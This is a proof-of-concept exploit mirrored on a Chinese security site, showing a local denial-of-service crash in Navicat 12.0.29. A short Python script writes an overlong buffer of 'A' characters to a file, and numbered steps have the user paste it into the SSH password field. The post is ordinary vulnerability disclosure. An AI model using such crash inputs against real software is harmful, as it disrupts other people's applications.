首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Navicat 12.0.29 - 'SSH' Denial of Service (PoC)
来源:vfocus.net 作者:Alfaro 发布时间:2018-10-30  
# Exploit Title: Navicat 12.0.29 - 'SSH' Denial of Service (PoC)
# Author: Rafael Alfaro
# Discovery Date: 2018-10-27
# Vendor Homepage: https://www.navicat.com/es/
# Software Link : https://www.navicat.com/es/download/navicat-premium
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 x64 en, Windows 10 Home x64 es
 
# Steps to Produce the Crash:
# 1.- Run python code : python Navicat-SSH.py
# 2.- Open navicat.txt and copy content to clipboard
# 3.- Open navicat.exe
# 4.- Click "Conexion" and select "MySQL..."
# 5.- In the "General" tab, give a name to the connection in "Nombre de Conexion" (i. e. conexion1).
# 6.- In the "SSH" tab check "Uso de tunel SSH", then set and IP address to the "Host" textbox (i. e. 127.0.0.1) and write down a username in "Nombre de usuario" (i. e. admin).
# 7.- Be sure that "Metodo de autentificacion" is set to "Contrasena" and finally paste Clipboard in "Contrasena".
# 8.- Click "Aceptar".
# 9.- Crashed!
 
# !/usr/bin/env python Navicat-SSH.py
 
buffer = "\x41" * 5000
f = open("navicat.txt", "w")
f.write(buffer)
f.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux mremap() TLB Flush Too L
·AlienIP 2.41 - Denial of Servi
·WordPress Arforms 3.5.1 Arbitr
·Modbus Slave PLC 7 - '.msw' Bu
·ASRock Drivers Privilege Escal
·Local Server 1.0.9 - Denial of
·Linux systemd Symlink Derefere
·Paramiko 2.4.1 - Authenticatio
·Linux systemd Line Splitting
·Modbus Slave 7.0.0 - Denial of
·xorg-x11-server Local Root
·Microsoft Windows 10 User Sess
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved